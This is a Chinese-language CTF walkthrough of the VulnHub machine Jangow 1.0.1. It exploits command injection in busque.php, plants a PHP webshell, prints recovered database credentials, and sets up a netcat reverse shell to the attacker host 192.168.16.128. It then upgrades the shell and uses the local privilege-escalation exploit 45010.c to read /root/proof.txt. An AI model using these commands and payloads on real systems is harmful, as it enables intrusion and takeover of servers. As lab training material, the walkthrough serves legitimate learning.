Jangow: 1.0.1 ~ VulnHub
这里信息搜集使用的是别人的图,
这里我们发现,
然后我们对目标的 80 端口进行访问
我们通过插件,然后获取到了当前页面下全部的 url 链接
ubuntu 和 php
对上述提到的这个 url 进行传参
http://192.168.16.133/site/busque.php?buscar=pwd
由于存在任意命令执行漏洞,那么我们接下来就可以考虑使用 echo 去创建一个 php 一句话木马
echo '' >shell1.php
$servername = "localhost"; $database = "jangow01"; $username = "jangow01"; $password = "abygurl69"; // Create connection $conn = mysqli_connect($servername, $username, $password, $database); // Check connection if (!$conn) { die("Connection failed: " . mysqli_connect_error()); } echo "Connected successfully"; mysqli_close($conn);
sudo iptables -A PREROUTING -t nat -p tcp --dport 1:65535 -j REDIRECT --to-port 1234
然后我们使用 nc 对 1234 这个端口实行监听
nc -lnvp 1234
for i in{1..65535}; do timeout 1 nc -vz 192.168.16.128 $i && echo "$i open" >> out.txt || echo "$i closed" >> out.txt; done
然后我们即可上传该文件,文件名为 text_shell.bash 文件
在进行这一步之前,确保 kali 的 ip 和 bash 一致,并且 kali 已经把所有端口绑定在同一个端口上;而且 nc 是正在监听中
这里我们既可以在哥斯拉里面执行 bash,也可以通过这个 url 里面进行传参,bash text_shell.bash 去执行 shell 文件
需要注意的一点是:我们上传 bash 文件之后,不一定能够执行,还需要我们去添加执行权限 chmod +x text_shell.bash
kali (192.168.16.128) 监听本地的 1234 端口
nc -lnvp 1234 (因为之前绑定了端口,所以这里直接监听的端口是 1234,而不是 443 端口)
反弹 shell 代码,被攻击机主动去连接攻击机(攻击机 ip 为 192.168.16.128)
我们上传 shell 文件,在目标服务器上
反弹 shell 文件代码如下所示:
&1|nc 192.168.16.128 443 >/tmp/f');?>
然后我们直接在目标服务器上运行该反弹 shell 文件,然后我们来到攻击机 kali 上
会发现我们的被攻击机 192.168.16.133 与我们的 kali 进行了连接
但是我们这里连接之后,靶机是没有提供 python 环境的,为了完善这个靶机的开发环境,我们可以输入
python3 -c 'import pty;pty.spawn("/bin/bash")'
其它语言升级 shell 的 code:
echo os.system('/bin/bash') /bin/sh -i #perl perl -e 'exec "/bin/sh";' #ruby exec "/bin/sh" ruby -e 'exec "/bin/sh"' #lua lua -e "os.execute('/bin/sh')"
这里我们提供三种查看系统配置信息的命令,最直观的是第三种
因为可以直接获取其具体的版本信息
uname -a cat /proc/version lsb_release -a
Linux jangow01 4.4.0-31-generic #50-Ubuntu SMP Wed Jul 13 00:07:12 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
www-data@jangow01:/var/www/html/site$
Distributor ID: Ubuntu
Description: Ubuntu 16.04.1 LTS
Release: 16.04
Codename: xenial
ubuntu 系统版本利用
searchsploit ubuntu 16.04
然后我们在 kali 中把利用代码放在复制到桌面上,然后将其移动到我们的真实主机上,通过哥斯拉进行上传
cp /usr/share/exploitdb/exploits/linux/local/45010.c 桌面/a.c
上传如图所示:
编译 a.c 文件,得到一个 a.out 文件,然后输入 ./a.out 执行 a.out 文件
cat /root/proof.txt